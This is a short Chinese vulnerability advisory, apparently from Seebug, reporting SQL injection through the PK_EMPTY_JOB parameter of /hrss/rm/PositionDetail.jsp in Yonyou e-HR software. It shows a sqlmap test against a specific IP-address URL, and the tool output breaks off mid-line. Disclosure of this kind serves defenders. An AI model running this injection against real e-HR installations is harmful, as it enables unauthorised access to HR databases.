用友人力资源管理(e-HR)SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ----------------------------------- 说点啥 ### 详细说明: [<img src="https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png" alt="472F3300-37DA-4FDD-AAF3-E36E8A5A52F7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09172603828f8c376c669ace4f60371f368e3c3b.png) [<img src="https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png" alt="7DD296A6-915C-4763-9C00-E0110C272A7E.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/09172751d662bc843259287c82833cfc2deeb393.png) ``` /hrss/rm/PositionDetail.jsp文件中PK_EMPTY_JOB参数存在SQL注入漏洞 ``` ``` 直接丢SQLMAP里跑: http://219.140.193.253/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& GET parameter 'PK_EMPTY_JOB' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 114 HTTP(s) requests: --- Place: GET Parameter:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息